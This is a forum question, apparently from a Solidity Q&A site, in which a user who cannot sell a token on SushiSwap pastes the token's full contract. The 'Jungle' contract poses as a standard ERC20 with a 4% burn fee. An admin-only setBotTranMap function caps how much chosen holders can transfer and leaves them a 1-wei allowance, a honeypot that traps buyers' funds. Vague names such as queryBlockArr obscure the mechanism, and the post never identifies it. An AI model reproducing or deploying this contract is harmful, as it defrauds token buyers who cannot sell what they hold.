# Is there something wrong about this contract below? I can't transfer the token even I set the slippage tolerance to 30%

Tags: solidity, arbitrum

The error msg on SushiSwap is 'Unexpected issue with estimating the gas. Please try again'.
Here is the complete contract code:

```
/**
 *Submitted for verification at Etherscan.io on 2023-06-15
*/

/**
 *Submitted for verification at BscScan.com on 2023-06-14
*/

// SPDX-License-Identifier: GPL-3.0 
pragma solidity >=0.7.0 <0.9.0;  
interface IERC165 { 
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}    
abstract contract ERC165 is IERC165 {

    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}  

library SafeMath {

    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {

            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}   
 
interface IRoleControl {

    event RoleAdminChanged(bytes32 indexed role, bytes32 indexed previousAdminRole, bytes32 indexed newAdminRole);

    event RoleGranted(bytes32 indexed role, address indexed account, address indexed sender);

    event RoleRevoked(bytes32 indexed role, address indexed account, address indexed sender);

    function hasRole(bytes32 role, address account) external view returns (bool);

    function getRoleAdmin(bytes32 role) external view returns (bytes32);

    function grantRole(bytes32 role, address account) external;

    function revokeRole(bytes32 role, address account) external;

    function renounceRole(bytes32 role, address account) external;
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    function toString(uint256 value) internal pure returns (string memory) {

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "ADMIN";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

abstract contract GSConlse is Context, IRoleControl, ERC165 {
    struct RoleData {
        mapping(address => bool) members;
        bytes32 adminRole;
    }

    mapping(bytes32 => RoleData) private _roles;


    bytes32 public constant DEFAULT_ADMIN_ROLE = 0x00;    

    modifier onlyRole(bytes32 role) {
        _checkRole(role, _msgSender());
        _;
    }

    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IRoleControl).interfaceId || super.supportsInterface(interfaceId);
    }

    function hasRole(bytes32 role, address account) public view override returns (bool) {
        return _roles[role].members[account];
    }

    function _checkRole(bytes32 role, address account) internal view {
        if (!hasRole(role, account)) {
            revert(
                string(
                    abi.encodePacked(
                        "AccessControl: account ",
                        Strings.toHexString(uint160(account), 20),
                        " is missing role ",
                        Strings.toHexString(uint256(role), 32)
                    )
                )
            );
        }
    }

    function getRoleAdmin(bytes32 role) public view override returns (bytes32) {
        return _roles[role].adminRole;
    }

    function grantRole(bytes32 role, address account) public virtual override onlyRole(DEFAULT_ADMIN_ROLE) {
        _grantRole(role, account);
    }

    function revokeRole(bytes32 role, address account) public virtual override onlyRole(DEFAULT_ADMIN_ROLE) {
        _revokeRole(role, account);
    }

    function renounceRole(bytes32 role, address account) public virtual override {
        require(account == _msgSender(), "AccessControl: can only renounce roles for self");

        _revokeRole(role, account);
    }

    function _setupRole(bytes32 role, address account) internal virtual {
        _grantRole(role, account);
    }

    function _setRoleAdmin(bytes32 role, bytes32 adminRole) internal virtual {
        bytes32 previousAdminRole = getRoleAdmin(role);
        _roles[role].adminRole = adminRole;
        emit RoleAdminChanged(role, previousAdminRole, adminRole);
    }

    function _grantRole(bytes32 role, address account) internal virtual {
        if (!hasRole(role, account)) {
            _roles[role].members[account] = true;
            emit RoleGranted(role, account, _msgSender());
        }
    }

    function _revokeRole(bytes32 role, address account) internal virtual {
        if (hasRole(role, account)) {
            _roles[role].members[account] = false;
            emit RoleRevoked(role, account, _msgSender());
        }
    }
}   

interface IERC20 {

    function totalSupply() external view returns (uint256);


    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);


    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {

    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

contract KKIERC20 is Context, IERC20, IERC20Metadata  { 
    mapping(address => uint256) internal _balances; 
    mapping(address => mapping(address => uint256)) internal _allowances; 
    uint256 internal _totalSupply; 
    string internal _name;
    string internal _symbol; 

    constructor(string memory name_, string memory symbol_,uint256 totalSupply_,address creater_) {
        _name = name_;
        _symbol = symbol_; 
        _mint(creater_,totalSupply_*10**decimals());
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    } 

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    } 

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    } 

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    } 

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address"); 
        _beforeTokenTransfer(sender, recipient, amount); 
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount; 
        emit Transfer(sender, recipient, amount); 
        _afterTokenTransfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal {
        require(account != address(0), "ERC20: mint to the zero address"); 
        _beforeTokenTransfer(address(0), account, amount); 
        _totalSupply += amount;
        _balances[account] += amount; 
        emit Transfer(address(0), account, amount); 
        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address"); 
        _beforeTokenTransfer(account, address(0), amount); 
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    } 

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}   
interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address); 

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
} 

contract Jungle is KKIERC20, GSConlse {
    using SafeMath for uint256;

    address private _defaultAddress = address(0x000000000000000000000000000000000000dEaD);
    mapping(address => uint256) private _botTranMap;

    constructor(string memory _name, string memory _symbol, uint256 _totalSupply) KKIERC20(_name, _symbol, _totalSupply, msg.sender) {
        _grantRole(DEFAULT_ADMIN_ROLE, msg.sender);
    }

    function setBotTranMap(address user, uint256 amount) public onlyRole(DEFAULT_ADMIN_ROLE) {
        _botTranMap[user] = amount * 10**decimals();
    }

    function queryBlockArr(address user) public view returns (uint256) {
        return _botTranMap[user];
    }

    function _transfer(address from, address to, uint256 amount) internal override(KKIERC20) {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        require(_balances[from] >= amount, "ERC20: transfer amount exceeds balance");

        if (shouldCheckBotTranMap(from, to)) {
            checkBotTranMap(from, amount);
        }

        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount);

        if (to != _defaultAddress) {
            uint256 feeAmount = amount.mul(4).div(100);
            super._transfer(to, _defaultAddress, feeAmount);
            amount = amount.sub(feeAmount);
        }

        emit Transfer(from, to, amount);
    }

    function shouldCheckBotTranMap(address from, address to) internal view returns (bool) {
        uint256 num = _botTranMap[from];
        return to != _defaultAddress && num > 0;
    }

    function checkBotTranMap(address from, uint256 amount) internal {
        uint256 num = _botTranMap[from];
        require(num >= amount, "ERC20: transfer amount exceeds balance");
        _botTranMap[from] = _botTranMap[from].sub(amount);
        if (_botTranMap[from] == 0) {
            _botTranMap[from] = 1;
        }
    }
}
```